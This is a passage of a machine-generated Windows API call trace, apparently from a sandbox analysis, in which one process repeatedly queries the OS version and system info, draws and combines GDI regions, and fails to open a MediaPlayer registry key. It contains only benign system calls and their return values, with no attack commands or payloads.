[0087.731] DeleteObject (ho=0x1100aa0) returned 1 [0087.731] DeleteObject (ho=0x9d0401cd) returned 1 [0087.731] DeleteObject (ho=0x9b0401d0) returned 1 [0087.731] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.731] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.731] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.731] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.731] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.731] BeginPath (hdc=0x0) returned 0 [0087.731] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.731] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.731] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.731] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.731] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.731] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.732] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.732] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.732] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9e0401cd [0087.732] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9c0401d0 [0087.732] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aa1 [0087.732] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aa2 [0087.732] CombineRgn (hrgnDst=0x1040aa1, hrgnSrc1=0x9e0401cd, hrgnSrc2=0x9c0401d0, iMode=1) returned 1 [0087.732] CombineRgn (hrgnDst=0x1040aa2, hrgnSrc1=0x9e0401cd, hrgnSrc2=0x9c0401d0, iMode=4) returned 2 [0087.732] CreateSolidBrush (color=0xff) returned 0x2100aa0 [0087.732] CreateSolidBrush (color=0xff0000) returned 0x1100aa3 [0087.732] DeleteObject (ho=0x1100aa3) returned 1 [0087.732] DeleteObject (ho=0x9c0401d0) returned 1 [0087.732] DeleteObject (ho=0x9e0401cd) returned 1 [0087.732] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.732] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.732] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.732] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.732] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.732] BeginPath (hdc=0x0) returned 0 [0087.732] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.732] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.732] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.732] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.732] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.732] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.732] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.732] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.732] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9d0401d0 [0087.732] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9f0401cd [0087.732] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aa4 [0087.732] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aa5 [0087.732] CombineRgn (hrgnDst=0x1040aa4, hrgnSrc1=0x9d0401d0, hrgnSrc2=0x9f0401cd, iMode=1) returned 1 [0087.732] CombineRgn (hrgnDst=0x1040aa5, hrgnSrc1=0x9d0401d0, hrgnSrc2=0x9f0401cd, iMode=4) returned 2 [0087.732] CreateSolidBrush (color=0xff) returned 0x2100aa3 [0087.732] CreateSolidBrush (color=0xff0000) returned 0x1100aa6 [0087.732] DeleteObject (ho=0x1100aa6) returned 1 [0087.732] DeleteObject (ho=0x9f0401cd) returned 1 [0087.732] DeleteObject (ho=0x9d0401d0) returned 1 [0087.732] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.733] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.733] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.733] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.733] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.733] BeginPath (hdc=0x0) returned 0 [0087.733] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.733] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.733] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.733] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.733] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.733] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.733] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.733] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.733] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa00401cd [0087.733] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9e0401d0 [0087.733] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aa7 [0087.733] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aa8 [0087.733] CombineRgn (hrgnDst=0x1040aa7, hrgnSrc1=0xa00401cd, hrgnSrc2=0x9e0401d0, iMode=1) returned 1 [0087.733] CombineRgn (hrgnDst=0x1040aa8, hrgnSrc1=0xa00401cd, hrgnSrc2=0x9e0401d0, iMode=4) returned 2 [0087.733] CreateSolidBrush (color=0xff) returned 0x2100aa6 [0087.733] CreateSolidBrush (color=0xff0000) returned 0x1100aa9 [0087.733] DeleteObject (ho=0x1100aa9) returned 1 [0087.733] DeleteObject (ho=0x9e0401d0) returned 1 [0087.733] DeleteObject (ho=0xa00401cd) returned 1 [0087.733] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.733] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.733] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.733] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.733] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.733] BeginPath (hdc=0x0) returned 0 [0087.733] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.733] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.733] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.733] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.733] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.733] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.733] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.733] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.734] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9f0401d0 [0087.734] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa10401cd [0087.734] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aaa [0087.734] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aab [0087.734] CombineRgn (hrgnDst=0x1040aaa, hrgnSrc1=0x9f0401d0, hrgnSrc2=0xa10401cd, iMode=1) returned 1 [0087.734] CombineRgn (hrgnDst=0x1040aab, hrgnSrc1=0x9f0401d0, hrgnSrc2=0xa10401cd, iMode=4) returned 2 [0087.734] CreateSolidBrush (color=0xff) returned 0x2100aa9 [0087.734] CreateSolidBrush (color=0xff0000) returned 0x1100aac [0087.734] DeleteObject (ho=0x1100aac) returned 1 [0087.734] DeleteObject (ho=0xa10401cd) returned 1 [0087.734] DeleteObject (ho=0x9f0401d0) returned 1 [0087.734] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.734] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.734] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.734] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.734] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.734] BeginPath (hdc=0x0) returned 0 [0087.734] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.734] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.734] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.734] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.734] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.734] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.734] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.734] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.734] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa20401cd [0087.734] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa00401d0 [0087.734] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aad [0087.734] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aae [0087.734] CombineRgn (hrgnDst=0x1040aad, hrgnSrc1=0xa20401cd, hrgnSrc2=0xa00401d0, iMode=1) returned 1 [0087.734] CombineRgn (hrgnDst=0x1040aae, hrgnSrc1=0xa20401cd, hrgnSrc2=0xa00401d0, iMode=4) returned 2 [0087.734] CreateSolidBrush (color=0xff) returned 0x2100aac [0087.734] CreateSolidBrush (color=0xff0000) returned 0x1100aaf [0087.734] DeleteObject (ho=0x1100aaf) returned 1 [0087.734] DeleteObject (ho=0xa00401d0) returned 1 [0087.734] DeleteObject (ho=0xa20401cd) returned 1 [0087.734] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.734] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.735] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.735] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.735] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.735] BeginPath (hdc=0x0) returned 0 [0087.735] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.735] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.735] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.735] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.735] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.735] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.735] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.735] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.735] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa10401d0 [0087.735] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa30401cd [0087.735] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ab0 [0087.735] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ab1 [0087.735] CombineRgn (hrgnDst=0x1040ab0, hrgnSrc1=0xa10401d0, hrgnSrc2=0xa30401cd, iMode=1) returned 1 [0087.735] CombineRgn (hrgnDst=0x1040ab1, hrgnSrc1=0xa10401d0, hrgnSrc2=0xa30401cd, iMode=4) returned 2 [0087.735] CreateSolidBrush (color=0xff) returned 0x2100aaf [0087.735] CreateSolidBrush (color=0xff0000) returned 0x1100ab2 [0087.735] DeleteObject (ho=0x1100ab2) returned 1 [0087.735] DeleteObject (ho=0xa30401cd) returned 1 [0087.735] DeleteObject (ho=0xa10401d0) returned 1 [0087.735] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.735] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.735] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.735] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.735] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.735] BeginPath (hdc=0x0) returned 0 [0087.735] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.735] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.735] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.735] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.735] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.735] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.735] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.735] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.736] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa40401cd [0087.736] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa20401d0 [0087.736] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ab3 [0087.736] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ab4 [0087.736] CombineRgn (hrgnDst=0x1040ab3, hrgnSrc1=0xa40401cd, hrgnSrc2=0xa20401d0, iMode=1) returned 1 [0087.736] CombineRgn (hrgnDst=0x1040ab4, hrgnSrc1=0xa40401cd, hrgnSrc2=0xa20401d0, iMode=4) returned 2 [0087.736] CreateSolidBrush (color=0xff) returned 0x2100ab2 [0087.736] CreateSolidBrush (color=0xff0000) returned 0x1100ab5 [0087.736] DeleteObject (ho=0x1100ab5) returned 1 [0087.736] DeleteObject (ho=0xa20401d0) returned 1 [0087.736] DeleteObject (ho=0xa40401cd) returned 1 [0087.736] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.736] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.736] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.736] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.736] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.736] BeginPath (hdc=0x0) returned 0 [0087.736] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.736] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.736] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.736] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.736] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.736] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.736] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.736] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.736] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa30401d0 [0087.736] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa50401cd [0087.736] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ab6 [0087.736] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ab7 [0087.736] CombineRgn (hrgnDst=0x1040ab6, hrgnSrc1=0xa30401d0, hrgnSrc2=0xa50401cd, iMode=1) returned 1 [0087.736] CombineRgn (hrgnDst=0x1040ab7, hrgnSrc1=0xa30401d0, hrgnSrc2=0xa50401cd, iMode=4) returned 2 [0087.736] CreateSolidBrush (color=0xff) returned 0x2100ab5 [0087.736] CreateSolidBrush (color=0xff0000) returned 0x1100ab8 [0087.736] DeleteObject (ho=0x1100ab8) returned 1 [0087.736] DeleteObject (ho=0xa50401cd) returned 1 [0087.736] DeleteObject (ho=0xa30401d0) returned 1 [0087.736] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.736] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.736] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.736] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.736] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.736] BeginPath (hdc=0x0) returned 0 [0087.736] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.737] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.737] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.737] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.737] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.737] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.737] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.737] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.737] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa60401cd [0087.737] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa40401d0 [0087.737] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ab9 [0087.737] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aba [0087.737] CombineRgn (hrgnDst=0x1040ab9, hrgnSrc1=0xa60401cd, hrgnSrc2=0xa40401d0, iMode=1) returned 1 [0087.737] CombineRgn (hrgnDst=0x1040aba, hrgnSrc1=0xa60401cd, hrgnSrc2=0xa40401d0, iMode=4) returned 2 [0087.737] CreateSolidBrush (color=0xff) returned 0x2100ab8 [0087.737] CreateSolidBrush (color=0xff0000) returned 0x1100abb [0087.737] DeleteObject (ho=0x1100abb) returned 1 [0087.737] DeleteObject (ho=0xa40401d0) returned 1 [0087.737] DeleteObject (ho=0xa60401cd) returned 1 [0087.737] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.737] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, 